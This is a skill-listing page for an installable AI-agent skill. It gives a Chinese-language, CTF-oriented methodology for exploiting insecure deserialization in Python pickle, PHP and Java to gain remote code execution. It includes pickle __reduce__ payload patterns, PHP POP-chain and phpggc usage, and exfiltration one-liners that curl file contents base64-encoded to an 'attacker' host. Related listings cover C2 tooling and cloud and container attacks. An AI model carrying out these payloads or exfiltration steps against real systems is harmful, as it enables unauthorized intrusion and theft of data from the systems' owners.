wgpsec/deserialization-methodology
skills/exploit/web-method/deserialization-methodology/SKILL.md
不安全反序列化漏洞利用。当发现 Base64 编码的 Cookie/参数、Python pickle 数据、PHP serialized 字符串(O:4:...)、Java serialized 数据(rO0AB...)时使用。可直接获取 RCE
$ install --global
skillsauthnpx skillsauth add wgpsec/AboutSecurity deserialization-methodologyInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 24, 2026, 5:46 AM56.2s7 files scanned
SKILL.md
- name:
- deserialization-methodology
- description:
- 不安全反序列化漏洞利用。当发现 Base64 编码的 Cookie/参数、Python pickle 数据、PHP serialized 字符串(O:4:...)、Java serialized 数据(rO0AB...)时使用。可直接获取 RCE
- tags:
- insecure_deserialization,deserialization,insecure deserialization,pickle,unserialize,php,java,rce
- category:
- exploit
反序列化漏洞方法论
深入参考
- Pickle payload 模板库(回显/盲/文件上传/发送方式)→ references/pickle-payload-templates.md
- RCE 成功但无回显?盲利用外带策略 → references/blind-exploitation.md
- PHP 反序列化详解(POP Chain/Type Juggling/phpggc) → references/php-deserialization.md
- .NET 反序列化利用(ViewState/BinaryFormatter/ysoserial.net) → references/dotnet-deserialization.md
Phase 1: 检测反序列化入口
常见位置:Cookie 值、POST Body、Hidden 表单字段(viewstate)、API 参数、文件上传
格式标识(Magic Bytes):
| 格式 | 识别特征 | 下一步 |
|------|----------|--------|
| Python Pickle | Base64 解码后 \x80 开头或含 cos\n(魔术字节) | → Phase 2 |
| PHP | O:4:"User":2:{ 或 a:N:{ 格式 | → Phase 3 |
| Java | Base64 解码后 \xac\xed\x00\x05(Magic Bytes)或 Base64 rO0AB 开头 | Java 反序列化利用 |
- 提取所有 Cookie 和隐藏字段的值,尝试 Base64 解码
- 检查
Content-Type头:application/x-python-pickle、application/x-java-serialized-object - 观察错误信息中是否包含
pickle、unserialize、ObjectInputStream等关键字 - 上传
.pkl、.ser等序列化文件格式,观察服务端行为 - 修改序列化数据中的字段值,观察响应变化确认服务端确实反序列化了输入
Phase 2: Python Pickle RCE
⚠️ 关键约束:__reduce__ 只能返回 (模块级函数, 参数元组) — self.method 会失败
- 构造基础 RCE payload:使用
__reduce__方法调用os.system或subprocess.check_output - 回显 payload:
subprocess.check_output(['cat', '/flag.txt'])— 直接在响应中看到结果 - 无回显 payload:
os.system('cp /flag.txt /app/static/f.txt')— 写文件到 Web 可访问路径 - 外带 payload:
os.system('curl http://attacker/?d=$(cat /flag|base64)')— HTTP 外传数据 - 序列化并编码:
base64.b64encode(pickle.dumps(payload))后替换原始数据发送 - 注意 Python 版本差异:Python 2/3 的 pickle 协议版本不同,可能需要指定
protocol=2
常见触发点:Flask session、Redis session、Content-Type: application/x-python-pickle、.pkl 文件上传
决策树:回显 payload → 无回显则写文件到 Web 路径 → 仍失败则读盲利用参考
→ 完整模板 → 读 references/pickle-payload-templates.md
Phase 3: PHP 反序列化
- 识别序列化字符串格式:
O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:4:"user";} - Type Juggling 速查:
b:1(boolean true)松散比较==可绕过任意密码验证 - 修改属性值:直接修改序列化字符串中的字段(注意长度前缀
s:N:要匹配) - POP Chain 构造:找到可控属性的类(如
__destruct中调用file_put_contents),通过链式属性控制实现任意文件写入或命令执行 - phpggc 工具:
phpggc <framework>/<gadget> <type> <arg>自动生成常见框架的利用链 - 常见框架 gadget:Laravel(RCE)、Symfony(文件写入)、WordPress(对象注入)
→ 完整 POP Chain/Type Juggling/phpggc 用法 → 读
references/php-deserialization.md
Phase 4: Flag 获取
- 反序列化 RCE 成功后优先执行:
cat /flag.txt、cat /FLAG.txt - 列目录搜索:
ls /→find / -name "*flag*" 2>/dev/null - 环境变量:
env | grep -i flag - 无回显时写到 Web 路径:
cp /flag* /app/static/flag.txt然后 HTTP 访问 - DNS/HTTP 外带:
curl http://attacker/$(cat /flag|base64) - 检查数据库:
cat /app/config*获取连接信息后查询 flag 表
Related Skills
wgpsec/azure-pentesting
testing
VerifiedTrustedCommunity
Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产(Blob Storage/App Service/Azure VM/Azure Functions)、获取 Azure 凭据(Service Principal/Managed Identity/Access Token)、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面
1,393SKILL.mdUpdated Apr 24, 2026
wgpsec/mythic-c2
tools
VerifiedTrustedCommunity
Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务,或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断
1,345SKILL.mdUpdated May 22, 2026
wgpsec/docker-pentesting
development
VerifiedTrustedCommunity
Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能
1,345SKILL.mdUpdated May 22, 2026
wgpsec/padbuster-padding-oracle
development
VerifiedTrustedCommunity
使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文,适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能
1,345SKILL.mdUpdated May 6, 2026